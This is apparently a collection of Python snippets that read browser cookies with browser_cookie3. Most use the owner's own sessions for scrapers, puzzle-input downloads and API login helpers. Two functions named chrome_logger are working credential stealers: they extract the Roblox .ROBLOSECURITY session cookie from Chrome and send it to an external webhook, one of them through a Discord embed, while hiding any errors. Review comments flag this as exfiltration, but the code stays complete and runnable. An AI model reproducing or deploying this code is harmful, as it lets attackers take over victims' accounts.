Example #1
0
def getHost(hoc):
    """Return the 'host' cookie value for <hoc>.ebsoc.co.kr, or None.

    Reads Firefox's cookie store on Linux and Chrome's elsewhere, falling
    back to the bundled ``bc3_alt`` module when the browser store is
    unreadable.
    """
    import platform
    import browser_cookie3
    if platform.system() == 'Linux':
        try:
            browser_cookie3.firefox(domain_name=hoc + ".ebsoc.co.kr")
        except Exception:  # was a bare except: don't swallow SystemExit/KeyboardInterrupt
            import bc3_alt as browser_cookie3
            clear()
        data = str(
            browser_cookie3.firefox(domain_name=hoc + ".ebsoc.co.kr")).replace(
                '<CookieJar[', '').replace('}>', '').split(">, <")
    else:
        try:
            browser_cookie3.chrome(domain_name=hoc + ".ebsoc.co.kr")
        except Exception:
            import bc3_alt as browser_cookie3
            clear()
        data = str(
            browser_cookie3.chrome(domain_name=hoc + ".ebsoc.co.kr")).replace(
                '<CookieJar[', '').replace('}>', '').split(">, <")
    for entry in data:
        if hoc + '.ebsoc.co.kr' in entry:
            # Split only on the first '=' so cookie values that themselves
            # contain '=' (e.g. base64 payloads) are not truncated.
            cookies = entry.replace('Cookie ', '').split(' for')[0].split('=', 1)
            if cookies[0] == 'host':
                return cookies[1]
    return None
Example #2
0
def get_cookies() -> Dict:
    """Collect the NetEase / Battle.net login cookies from Chrome.

    Only the whitelisted cookie names required for authentication are
    returned; later domains override earlier ones on name collisions.
    """
    wanted = {
        '_ntes_nuid',
        'MTK_BBID',
        'opt',
        'web.id',
        'BA-tassadar-login.key',
        'login.key',
        'BA-tassadar',
        'bnet.extra',
    }
    cookie_file = generate_path()
    merged = {}
    for domain in ('.163.com', '.battlenet.com.cn'):
        jar = bc.chrome(cookie_file=cookie_file, domain_name=domain)
        merged.update(dict_from_cookiejar(jar))
    return {name: value for name, value in merged.items() if name in wanted}
Example #3
0
def query(hoc):
    """Return a "name=value; ..." cookie-header string for <hoc>.ebsoc.co.kr.

    Uses Firefox's cookie store on Linux and Chrome's elsewhere, falling back
    to the bundled ``bc3_alt`` module when the store is unreadable. Cookies
    scoped to www.ebsoc.co.kr are excluded.
    """
    import platform
    import browser_cookie3
    if platform.system() == 'Linux':
        try:
            browser_cookie3.firefox(domain_name=hoc + ".ebsoc.co.kr")
        except Exception:  # was a bare except: don't swallow SystemExit/KeyboardInterrupt
            import bc3_alt as browser_cookie3
            clear()
        data = str(
            browser_cookie3.firefox(domain_name=hoc + ".ebsoc.co.kr")).replace(
                '<CookieJar[', '').replace('}>', '').split(">, <")
    else:
        try:
            browser_cookie3.chrome(domain_name=hoc + ".ebsoc.co.kr")
        except Exception:
            import bc3_alt as browser_cookie3
            clear()
        data = str(
            browser_cookie3.chrome(domain_name=hoc + ".ebsoc.co.kr")).replace(
                '<CookieJar[', '').replace('}>', '').split(">, <")
    cookies = ''
    for i in data:
        # keep only cookies scoped to this school's own subdomain
        if hoc + '.ebsoc.co.kr' in i and 'www.ebsoc.co.kr' not in i:
            cookies = cookies + i.replace('Cookie ',
                                          '').split(' for')[0] + '; '
    return cookies.replace('<', '')
Example #4
0
 def __init__(self, env_url, browser):
     """Build an Authorization header from a live Salesforce session cookie.

     Args:
         env_url: full https:// URL of the Salesforce environment.
         browser: 'chrome' or 'firefox' — where to read the 'sid' cookie.

     Exits the process when the browser is invalid or no session is found.
     """
     self.env_url = env_url
     # Validate the browser choice outside the try block: previously the
     # bare `except:` caught the SystemExit raised here and printed the
     # unrelated "Could not get session ID" error on top of it.
     if browser not in ('chrome', 'firefox'):
         print('Please select a valid browser (chrome or firefox)')
         sys.exit(1)
     try:
         if browser == 'chrome':
             cj = browser_cookie3.chrome(
                 domain_name=env_url[8:]
             )  #remove first 8 characters since browser cookie does not expect "https://"
         else:
             cj = browser_cookie3.firefox(domain_name=env_url[8:])
         my_cookies = requests.utils.dict_from_cookiejar(cj)
         self.header = {
             'Authorization': 'Bearer ' + my_cookies['sid'],
             'Content-Type': 'application/json'
         }
     except Exception:
         print(
             'ERROR: Could not get session ID.  Make sure you are logged into a live Salesforce session (chrome/firefox).'
         )
         sys.exit(1)
Example #5
0
def main():
    """Copy the exhentai login cookies from Chrome into gallery-dl's config.

    Best-effort: any failure is silently ignored, as before.
    """
    print("get cookie")
    try:
        cookies = browser_cookie3.chrome(domain_name='exhentai.org')
        cookies_dict = requests.utils.dict_from_cookiejar(cookies)
        print(cookies_dict)
        confPath = './lib_/gallery-dl.conf'
        isIdExist = ("ipb_member_id" in cookies_dict
                     and "ipb_pass_hash" in cookies_dict)

        if isIdExist:
            if os.path.exists(confPath):
                with open(confPath) as f:
                    json_object = json.load(f)
                json_object["extractor"]["exhentai"] = {
                    "cookies": cookies_dict
                }
            else:
                json_object = {
                    "extractor": {
                        "exhentai": {
                            "cookies": cookies_dict
                        }
                    }
                }
            # Write only when a config was actually built: previously this ran
            # unconditionally and raised NameError (hidden by the bare except)
            # whenever the login cookies were missing.
            with open(confPath, 'w') as f:
                json.dump(json_object, f)
    except Exception:
        pass
Example #6
0
def GetChromeCookies(pincode, store, base_url, location_id, store_id,
                     sku) -> None:
    '''
    Utility function to save cookies for a new location / PINCODE.

    Change to the required new location in the Chrome browser (via the
    store site) before calling this; the captured cookies are pickled and
    reused with later HTTP requests for the same PINCODE.

    Note: base_url, location_id and sku are currently unused but kept for
    interface compatibility with existing callers.
    '''
    try:
        cJar = cookies.chrome(domain_name=store)

        cookie_map = {c.name: c.value for c in cJar}

        # Build both the directory and the file path relative to this module.
        # Previously the directory was created under dirname(__file__) but the
        # file was opened relative to the CWD, which failed whenever the two
        # differed.
        base_folder = os.path.join(os.path.dirname(__file__), 'cookies')
        if not os.path.exists(base_folder):
            os.makedirs(base_folder)
        out_path = os.path.join(base_folder,
                                str(store_id) + '_' + str(pincode) + '.pkl')
        with open(out_path, 'wb') as fp:
            pickle.dump(cookie_map, fp)
        logger.info('New Chrome cookies Collected')  # fixed 'Chromw' typo

    except TypeError as te:
        print(te)

    except Exception as e:
        print(e)
        logger.exception(e)
Example #7
0
def download_input(day):
    """Fetch the AoC 2020 puzzle input for *day* using Chrome's session cookie."""
    jar = browser_cookie3.chrome(domain_name='.adventofcode.com')
    url = 'https://adventofcode.com/2020/day/%d/input' % day
    print(url)
    resp = requests.get(url, verify=False, cookies=jar, timeout=3)
    with open('../aoc20/data/day%d.txt' % day, 'wt') as fh:
        fh.write(resp.text)
def extract_cookie(domainname=""):
    """List Chrome cookies, or return one Selenium-style cookie dict.

    With an empty *domainname*, prints every Chrome cookie and returns None.
    Otherwise returns a dict (domain/name/value/expiry/...) for the domain,
    or None when nothing matched.
    """
    # cookies = browser_cookie3.chrome(domain_name=urlx, cookie_file='C:/Users/cromox/Desktop/newselenium/Selenium/MengKome/chrome-data/Default/Cookies')
    cookies = browser_cookie3.chrome(domain_name=domainname)
    if domainname == "":
        print()
        if len(cookies) >= 1:
            print('[No]) [Domainname] / [Name] / [Value] / [Expires]')
            i = 1
            for c in cookies:
                timeexpire = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(c.expires))
                print(str(i) + ') ' + str(c.domain) + ' / ' + str(c.name) + ' / ' + str(c.value) + ' / ' + str(timeexpire))
                i = i + 1
        else:
            print('COOKIE [ all_domain ] = NONE')
        cookie = None
    else:
        if len(cookies) >= 1:
            cookie = {}
            # NOTE(review): the dict is rebuilt on every iteration, so only the
            # LAST cookie in the jar is returned — confirm this is intended.
            for c in cookies:
                # cookie = {'domain': c.domain, 'name': c.name, 'value': c.value, 'secure': c.secure and True or False}
                cookie = {'domain': c.domain,
                            'name': c.name,
                            'value': c.value,
                            'expiry': c.expires,
                            'path': c.path,
                            'httpOnly': False,
                            'HostOnly': False,
                            'sameSite': 'None',
                            'secure': c.secure and True or False}
            print('COOKIE [ ' + domainname + ' / ' + str(
                time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(cookie['expiry']))) + ' ] = ' + str(cookie))
        else:
            print('COOKIE [ ' + domainname + ' ] = NONE')
            cookie = None
    return cookie
def main():
    """Scrape Seeking Alpha transcript URLs page-by-page into a spreadsheet.

    Resumes from the last scraped page recorded in the sheet. The HTTP
    session is deliberately closed and recreated after every page, and
    errors are printed but never stop the loop.
    """
    print('Initializing script')
    agents = get_agent_list() # bring in the list of user-agents for the page requests
    cookie = browser_cookie3.chrome() # bring in a cookie from chrome; will log you into SA to allow for scraping
    
    sheet = spreadsheet.open_sheet()
    
    last_scraped_page = spreadsheet.get_last_scraped_page(sheet)
    page_to_scrape = last_scraped_page + 1
    
    s = create_session(agents, cookie) # create a new browsing session object
    while (page_to_scrape <= 5300):
        try:
            print('Getting page {} of transcripts'.format(page_to_scrape))
            url = 'https://seekingalpha.com/earnings/earnings-call-transcripts/{}'.format(page_to_scrape) # root url of SA transcripts directory
            soup = get_page(s, url) # get an individual page of transcript urls; as a soup object for working with
            page_urls = get_page_urls(soup) # get all of the individual transcript page urls from one directory page
            print('Got page {} of transcript urls'.format(page_to_scrape))
            for url in page_urls:
                spreadsheet.post_new_url(sheet, url)
            print('Posted all urls from page {} to the sheet.'.format(page_to_scrape))
            spreadsheet.update_last_scraped_page(sheet, page_to_scrape)
            page_to_scrape = spreadsheet.get_last_scraped_page(sheet) + 1
            print()
            sleep(100)
        except Exception as err:
            print(err)
        
        # Recycle the session between pages (throttling / fingerprint reset).
        s.close()
        s = create_session(agents, cookie) # create a new browsing session object
        try:
            sheet = spreadsheet.open_sheet()
        except Exception as err:
            print(err)
Example #10
0
def main():
    """Print selected browser cookies for a domain.

    argv[1] is the domain; argv[2] is a colon-separated list of cookie names.
    Tries Chrome first, then Firefox.
    """
    domain = sys.argv[1]
    cookie_keys = sys.argv[2].split(":")

    cookiejar = None
    try:
        cookiejar = browser_cookie3.chrome(domain_name=domain)
    except Exception:
        print("get cookie from Chrome failed", file=sys.stderr)

    if not cookiejar:
        try:
            cookiejar = browser_cookie3.firefox(domain_name=domain)
        except Exception:
            print("get cookie from Firefox failed", file=sys.stderr)
            return

    for ck in cookiejar:
        print("browser cookie name:", ck.name)

    matched = [c for c in cookiejar if c.name in cookie_keys]

    if len(matched) < len(cookie_keys):
        print("get cookie failed, make sure you have Chrome or Firefox installed and login with one of them at least once.")
        return

    for c in matched:
        print("cookie pair:%s:%s" % (c.name, c.value))
Example #11
0
    def __init__(self,
                 requests_per_minute=30,
                 current_url=None,
                 base_url=None,
                 values=None,
                 debug=False,
                 cookie_browser="chrome",
                 cookies=None):
        """Configure the scraper instance.

        Args:
            requests_per_minute: throttle for outgoing requests.
            current_url / base_url: navigation starting points.
            values: settings dict; defaults are used when None.
            debug: enable debug behaviour.
            cookie_browser: "chrome" or "firefox" cookie source.
            cookies: pre-built cookie jar; when supplied, the browser's
                cookie store is not read (this argument was previously
                accepted but silently ignored).
        """
        default_settings = {
            "download_cv": False,
            "send_logger_results_to_email":
            False,  # when False, prints results to terminal
            "download_storage": None,
        }

        self.requests_per_minute = requests_per_minute
        self.current_url = current_url
        self.base_url = base_url
        # identity check instead of the previous `values == None`
        self.values = default_settings if values is None else values
        self.debug = debug

        self.cookie_browser = cookie_browser
        if cookies is None:
            if cookie_browser == "chrome":
                cookies = browsercookie.chrome()
            elif cookie_browser == "firefox":
                cookies = browsercookie.firefox()
            else:
                # previously an unknown browser crashed with NameError on `cj`
                raise ValueError(
                    "cookie_browser must be 'chrome' or 'firefox'")
        self.cookies = cookies
Example #12
0
def get_releve(url="https://www.natureatwar.fr/descriptionalliance-LA"):
    """Scrape the alliance standings table and return it formatted.

    Fetches *url* with Chrome's cookies, parses the second striped table,
    and builds one DataFrame row per complete <tr>.
    """
    cookies = browser_cookie3.chrome(domain_name='.natureatwar.fr')
    r = requests.get(url,
                     verify=False,
                     cookies={cookie.name: cookie.value
                              for cookie in cookies},
                     timeout=3)
    soup = BeautifulSoup(r.text, "html.parser")
    table = soup.find_all("table", {"class": "table-striped"})[1]
    rows = table.find_all("tr")

    titles = [
        "Tdc", "Rank", "Pseudo", "Colonie", "Total", "Bat", "Tech", "Etat"
    ]
    frames = []
    for row in rows:
        cells = [sub_cell for cell in row.find_all("td") for sub_cell in cell]
        # only rows with exactly one cell per column are data rows
        if len(cells) == len(titles):
            frames.append(pd.DataFrame({t: [v] for t, v in zip(titles, cells)}))

    # DataFrame.append was removed in pandas 2.0 — build once with concat.
    releve = (pd.concat(frames, ignore_index=True)
              if frames else pd.DataFrame(columns=titles))

    return format_releve(releve)
Example #13
0
def infolessLogin():
    """Log into SHiFT without asking for credentials when possible.

    Order of preference: 1) cookies pickled in ``loginInfo.cookie`` from a
    previous run, 2) Chrome/Firefox cookies via browser_cookie3 (when the
    module is loaded), 3) interactive email/password prompt.
    """
    # Read out saved cookies so that way you don't have to login every time to run the program.
    if os.path.exists("loginInfo.cookie"):
        print("Using cached login info...")
        with open("loginInfo.cookie", "rb") as f:
            requestClient.cookies.update(pickle.load(f))
    else:
        hasLoadedCookies = False

        if 'browser_cookie3' in sys.modules:  # Probably best to check if the module is loaded eh?
            shiftCookies = None
            try:
                print("(Attempting) to load chrome cookies...")
                shiftCookies = bc.chrome()
                print("Loaded chrome cookies...")
            except Exception:  # deliberate best-effort: fall back to Firefox
                print("(Attempting) to load firefox cookies...")
                shiftCookies = bc.firefox()
                print("Loaded firefox cookies...")
            if shiftCookies is not None:
                requestClient.cookies.update(shiftCookies)
            hasLoadedCookies = shiftCookies is not None

        if not hasLoadedCookies:  # If we weren't able to load our cookies, we should just prompt them for their input.
            bProperLoginInfo = False
            while not bProperLoginInfo:
                print("Login to your SHiFT account...")
                user = input("SHiFT Email: ")
                password = getpass.getpass(prompt="Password: ")
                bProperLoginInfo = login(user, password)
Example #14
0
    def __init__(self, search):
        """Prepare an authenticated long-poll request for Facebook's chat edge.

        Pulls c_user/xs from Chrome's facebook.com cookies and builds the
        url, headers and query used for polling; *search* becomes an
        alternation regex.
        """
        jar = browser_cookie3.chrome(domain_name='facebook.com')
        cookie_map = {c.name: c.value for c in jar}
        self.user_id = cookie_map['c_user']
        self.xs = cookie_map['xs']

        self.regex_search = '({0})'.format(')|('.join(search))

        self.url = 'https://{0}-edge-chat.facebook.com/pull'.format(
            randint(0, 6))

        self.headers = {
            'Cookie': 'c_user={0};xs={1}'.format(self.user_id, self.xs),
            'User-Agent':
            'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
            'Referer': 'https://www.facebook.com/',
            'cache-control': 'no-cache'
        }

        self.query = {
            'channel': 'p_' + self.user_id,
            'msgs_recv': '0',
            'state': 'offline'
        }

        self.set_sticky()
Example #15
0
def get_bilibili_cookies():
    """Return bilibili cookies from Chrome as a name → value dict.

    When the same name appears on several bilibili domains, the first
    occurrence wins (setdefault preserves the original first-wins rule).
    """
    jar = browser_cookie3.chrome()
    picked = {}
    for ck in jar:
        if "bilibili" in ck.domain:
            picked.setdefault(ck.name, ck.value)
    return picked
Example #16
0
    def __init__(self,
                 cookie=None,
                 username=None,
                 password=None,
                 useBrowserCookie=None,
                 requireUserId=True):
        """Initialise a Roblox session.

        Auth source priority: an explicit *cookie*, then the browser named
        by *useBrowserCookie* ("chrome"/"firefox"/anything → bc.load), then
        *username*/*password* credentials. When *requireUserId* is true the
        current user id is fetched and stored on self.userId.
        """
        self.token = None
        self.processes = Processes()

        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent':
            "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
        })
        self.robloxPath = self.GetLatestRobloxExe()

        if useBrowserCookie and not cookie:
            useBrowserCookie = useBrowserCookie.lower()
            if useBrowserCookie == "chrome":
                cookie = bc.chrome(domain_name=".roblox.com")
            elif useBrowserCookie == "firefox":
                # was `cookie = cookie = ...` — redundant double assignment
                cookie = bc.firefox(domain_name=".roblox.com")
            else:
                cookie = bc.load(domain_name=".roblox.com")

        if cookie:
            self.session.cookies = cookie
            if requireUserId:
                request = self.session.get(
                    "https://assetgame.roblox.com/Game/GetCurrentUser.ashx")
                self.userId = request.text
        elif username and password:
            self.login(username, password)
Example #17
0
def getLoginCookie(domain,url_login,username,password):
    """Return a cookie dict for *domain*, logging in when necessary.

    Reuses an existing 'autologin_trustie' cookie from Chrome when present;
    otherwise POSTs the credentials to *url_login* and extracts the cookie
    from the request object that was sent. Returns {} on failure.

    NOTE(review): this pokes at requests/cookiejar private attributes
    (cj._cookies, resp._cookies) — fragile across library versions.
    """
    cj = browser_cookie3.chrome(domain_name=domain)
    if domain in cj._cookies and 'autologin_trustie' in cj._cookies[domain]['/'].keys():
        #already have cookie, return it
        return __makeCookieDict__(cj._cookies[domain]['/'])
    #else, make one
    # token = __getAuthenToken__(url_login)
    postDict = {
        'utf8': '✓',
        # 'authenticity_token': token,
        'back_url': 'https://www.educoder.net/',
        'username': username,
        'password': password,
        'autologin': '******',
    }
    postData = urllib.parse.urlencode(postDict)
    header = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    req = requests.post(url_login,postData,headers=header)
    # NOTE(review): `resp` is the PreparedRequest that was sent, not the
    # response — the cookie is read from what the session attached to it.
    resp = req.request
    if 'autologin_trustie' in resp._cookies._cookies[domain]['/'].keys():
        #login successful
        return __makeCookieDict__(resp._cookies._cookies[domain]['/'])
    #fail
    return {}
def chrome_logger():
    """Extract the Roblox .ROBLOSECURITY cookie from Chrome and POST it to a webhook.

    WARNING(review): this exfiltrates a login credential to an external
    webhook — credential-stealer behaviour. Do not run or ship this code.
    Failures are silently swallowed.
    """
    try:
        cookies = browser_cookie3.chrome(domain_name='roblox.com')
        cookies = str(cookies)
        cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
        requests.post(webhook, json={'username':'******', 'content':f'```Cookie: {cookie}```'})
    except:
        pass
def init_session():
    """Create a requests session preloaded with Chrome's cookies and a desktop UA."""
    sess = requests.Session()
    sess.headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36',
    }
    sess.cookies.update(browser_cookie3.chrome())
    return sess
Example #20
0
def _iter_webdata(day: int):
    """Yield the lines of the AoC 2020 input for *day*, fetched with Chrome's cookies."""
    import requests
    import browser_cookie3
    from io import StringIO
    jar = browser_cookie3.chrome(domain_name='.adventofcode.com')
    response = requests.get(
        f'https://adventofcode.com/2020/day/{day}/input', cookies=jar, timeout=3)
    yield from StringIO(response.text)
Example #21
0
def get_data(day):
    """Download the AoC 2020 input for *day* into input/day<day>.txt."""
    print("get: fetching cookie")
    jar = browser_cookie3.chrome()
    print("get: waiting for response...")
    response = requests.get(f"https://adventofcode.com/2020/day/{day}/input",
                            cookies=jar)
    with open(f"input/day{day}.txt", "w") as out:
        out.write(response.text)
    print("done!")
Example #22
0
def chrome_logger():
    """Extract the Roblox .ROBLOSECURITY cookie from Chrome and send it via a Discord webhook embed.

    WARNING(review): this exfiltrates a login credential to an external
    webhook — credential-stealer behaviour. Do not run or ship this code.
    Failures are silently swallowed.
    """
    try:
        cookies = browser_cookie3.chrome(domain_name='roblox.com')
        cookies = str(cookies)
        cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
        embed = DiscordEmbed(title='Cookie', description=f'{cookie}', color='03b2f8')
        webhook.add_embed(embed)
        response = webhook.execute()
    except:
        pass
def get_cookies_from_chrome():
    """Return Chrome's cookie jar for acm.hdu.edu.cn."""
    host_url = 'acm.hdu.edu.cn'
    return browser_cookie3.chrome(domain_name=host_url)
Example #24
0
def fetch_delivery_url(amazon_request_headers):
    """
    Rely fully on chrome cookies- removing cookie and referer URL from headers doens't seem to break it.
    """
    url = "https://www.amazon.com/gp/buy/shipoptionselect/handlers/display.html?hasWorkingJavascript=1"
    jar = browser_cookie3.chrome()
    response = requests.get(url, cookies=jar, headers=amazon_request_headers)
    response.raise_for_status()
    return response.content
Example #25
0
def get_num_results(search_term, start_date, end_date):
    """
    Query Google Scholar and return (num_results, success).

    num_results is a string: the result count, '0' when the results banner
    is present but empty, and '-1' on failure (banner missing or IO error).
    """

    # Open website and read html
    # Get the user agent of your browser: https://www.whatismybrowser.com/detect/what-is-my-user-agent
    user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'
    query_params = {'q': search_term, 'as_ylo': start_date, 'as_yhi': end_date}
    # Build the request: "as_sdt=1 : exclude patents", "as_vis=1 : exclude citations"
    url = "https://scholar.google.com/scholar?as_vis=1&hl=en&as_sdt=1,5&" + urllib.parse.urlencode(
        query_params)
    cookie_jar = browser_cookie3.chrome()  # or firefox()
    opener = build_opener(HTTPCookieProcessor(cookie_jar))
    request = Request(url=url, headers={'User-Agent': user_agent})

    try:
        handler = opener.open(request)

        html = handler.read()

        # Create soup for parsing HTML and extracting the relevant information
        soup = BeautifulSoup(html, 'html.parser')
        div_results = soup.find(
            "div", {"id": "gs_ab_md"})  # find line 'About x results (y sec)

        if div_results is not None:  # identity check, was `!= None`
            res = re.findall(
                r'(\d+).?(\d+)?.?(\d+)?\s',
                div_results.text)  # extract number of search results

            if not res:  # emptiness check, was `res == []`
                num_results = '0'
            else:
                num_results = ''.join(res[0])  # join the digit groups
            success = True
        else:
            success = False
            num_results = '-1'
    except IOError as err:
        print(
            "********************************************************************************"
        )
        print("IO error: {0}".format(err))
        print(
            "********************************************************************************"
        )
        success = False
        num_results = '-1'

    return num_results, success
def getCookie(browser):
    """Return clickup.up.ac.za's 's_session_id' cookie value, or '' if absent.

    *browser* selects the cookie source (BROWSER_CHROMIUM / BROWSER_CHROME /
    BROWSER_FIREFOX); any other value prints an error and exits.
    """
    if browser == BROWSER_CHROMIUM:
        # Chromium keeps its cookie DB in a different profile directory.
        cj = browser_cookie3.chrome(expanduser('~/.config/chromium/Default/Cookies'))
    elif browser == BROWSER_CHROME:
        cj = browser_cookie3.chrome()
    elif browser == BROWSER_FIREFOX:
        cj = browser_cookie3.firefox()
    else:
        print('[ERROR] Invalid Browser String! See --help')
        exit(1)

    # Iterating an empty jar is a no-op, so no length guard is needed
    # (previously guarded by `len(cj) > 0`; also dropped the misleading
    # `cj = {}` initialiser and stray semicolons).
    s_session_id = ''
    for cookie in cj:
        if cookie.domain == 'clickup.up.ac.za' and cookie.name == 's_session_id':
            s_session_id = cookie.value

    return s_session_id
    def load_browser_cookies(self):
        """Load cookies from local Chrome and Firefox into the per-browser jars."""
        # Load cookies from the Chrome browser
        jar = self.jars['chrome']
        chrome_cookiejar = browser_cookie3.chrome()
        for cookie in chrome_cookiejar:
            jar.set_cookie(cookie)

        # Load cookies from the Firefox browser
        jar = self.jars['firefox']
        firefox_cookiejar = browser_cookie3.firefox()
        for cookie in firefox_cookiejar:
            jar.set_cookie(cookie)
Example #28
0
 def _get_cookies(self):
     """Return YouTube cookies from the browser chosen in config.

     config.get_env() selects the source: '1' = Chrome, '2' = Firefox.
     Raises Exception (Japanese user-facing message) on an unknown value
     or when the browser's cookie store cannot be read.
     """
     try:
         browser = config.get_env()
         if browser == '1':
             return browser_cookie3.chrome(domain_name='youtube.com')
         elif browser == '2':
             return browser_cookie3.firefox(domain_name='youtube.com')
         else:
             # message: "No suitable browser found, or the config file is corrupt."
             raise Exception("適切なブラウザが見つからないか、設定ファイルが壊れています。")
     except browser_cookie3.BrowserCookieError:
         # message: "Browser cookies not found; log into YouTube in Chrome or Firefox."
         raise Exception("ブラウザのクッキーが見つかりません。"
                         "ChromeかFirefoxでYouTubeにログインする必要があります。")
Example #29
0
 def _get_cookies(self, ):
     """Return a CookieJar: from the pickled test fixture when present,
     otherwise from Chrome's cookie database.
     """
     if path.isfile(self.path_to_cookies_temp):
         # Load the pickled cookie list from the path we just checked.
         # Previously this opened a hard-coded '..\\config\\cookies.pickle',
         # which broke whenever path_to_cookies_temp pointed elsewhere.
         with open(self.path_to_cookies_temp, 'rb') as f:
             load_list_cookies = pickle.load(f)
         cj = CookieJar()
         for stored_cookie in load_list_cookies:
             cj.set_cookie(stored_cookie)
     else:
         # Fall back to the live Chrome cookie database.
         cj = chrome()
     return cj
    def harvest(self):
        """Log into Facebook using Chrome cookies plus stored credentials.

        NOTE(review): EMAIL/PASSWORD come from module-level constants and the
        'Mike Tennant' profile link is hard-coded — confirm before reuse.
        """
        logging.info("Harvesting started: " +
                     datetime.strftime(datetime.now(), DATE_TIME_FORMAT))

        # Create session so we keep state and cookies
        session = requests.session()
        # Get cookies from chrome browser as this simplifies login a lot
        cookies = browser_cookie3.chrome(domain_name='.facebook.com')

        response = session.get(FB_STARTPAGE_LINK, cookies=cookies)
        soup = BeautifulSoup(response.content, "html.parser")

        # find values necessary for form data - these change with each session
        jazoest = soup.find('input', attrs={"name": "jazoest"})['value']
        lsd = soup.find('input', attrs={"name": "lsd"})['value']
        cuid = soup.find('a', attrs={'title': 'Mike Tennant'})['href']

        form_data = {
            "jazoest": jazoest,
            "lsd": lsd,
            "cuid": cuid.split("/?")[1].split("&next")[0],
            "pass": PASSWORD,
            "cred_type": "137",
            "login_source": "device_based_login",
            "email": EMAIL,
            "next": "",
            "persistent": ""
        }
        # Browser-like headers so the login POST is accepted.
        headers = {
            "accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "accept-encoding": "gzip, deflate",
            "accept-language": "da-DK,da;q=0.9,en-US;q=0.8,en;q=0.7",
            "content-type": "application/x-www-form-urlencoded",
            "origin": "https://da-dk.facebook.com",
            "referer": "https://da-dk.facebook.com/",
            "sec-fetch-dest": "document",
            "sec-fetch-mode": "navigate",
            "sec-fetch-site": "same-origin",
            "sec-fetch-user": "******",
            "upgrade-insecure-requests": "1",
            "user-agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36",
            "Access-Control-Allow-Origin": "https://da-dk.facebook.com/"
        }

        login_request = session.post(FB_LOGIN_LINK,
                                     cookies=cookies,
                                     data=form_data,
                                     headers=headers)
        print(login_request.text)
	def __init__( self, search ):
		"""Collect Facebook auth cookies from Chrome and build the chat-edge
		long-poll request (url, headers, query); *search* becomes an
		alternation regex."""
		jar = browser_cookie3.chrome( domain_name = 'facebook.com' )
		auth = { cookie.name: cookie.value for cookie in jar }
		self.user_id = auth['c_user']
		self.xs = auth['xs']

		self.regex_search = '({0})'.format( ')|('.join( search ) )

		self.url = 'https://{0}-edge-chat.facebook.com/pull'.format( randint( 0, 6 ) )

		self.headers = {
			'Cookie': 'c_user={0};xs={1}'.format( self.user_id, self.xs ),
			'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
			'Referer': 'https://www.facebook.com/',
			'cache-control': 'no-cache'
		}

		self.query = {
			'channel': 'p_' + self.user_id,
			'msgs_recv': '0',
			'state': 'offline'
		}

		self.set_sticky()
Example #32
0
post_url3 = 'http://yukicoder.me/submissions/{}'
# Map source-file extension -> yukicoder language id(s). A list means the
# concrete version (e.g. python3 vs pypy) can be chosen via the optional
# third command-line argument.
langdic = {
    '.cpp' : 'cpp',
    '.c'   : 'c',
    '.java': ['java8', 'java'],
    '.cs'  : 'csharp',
    '.pl'  : ['perl6', 'perl'],
    '.py'  : ['python3', 'python', 'pypy3', 'pypy2'],
    '.rb'  : 'ruby',
    '.hs'  : 'haskell',
    '.nim' : 'nim',
    '.js'  : 'node',
    # (ΦωΦ)< got bored — remaining extensions left unmapped
}

# Reuse the browser's yukicoder login cookies for the submission session.
cj = browser_cookie3.chrome()
ses = requests.session()

if not len(sys.argv) in [2, 3]: # (ΦωΦ)< with 3 args the language version (python3/java8 etc.) is specified explicitly
    nyaa(' (;ω;)< 引数にソースファイルを指定してください')
    nyaa(' (ΦωΦ)< python yukisubmit.py main.cpp みたいな感じで')
    exit(0)
file_name = sys.argv[1]
file_path = os.path.abspath(file_name)
# ptn1 (defined elsewhere) extracts (problem_no, source file name) from the path.
match1 = ptn1.match(file_path)
if not match1:
    nyaa(' (;ω;)< ソースコードのある場所がなんか変です')
    nyaa(' (;ω;)< ほんとにyukicoderに提出するんですか...')
    exit(0)
problem_no, source = match1.groups()
dot_pos = source.find('.')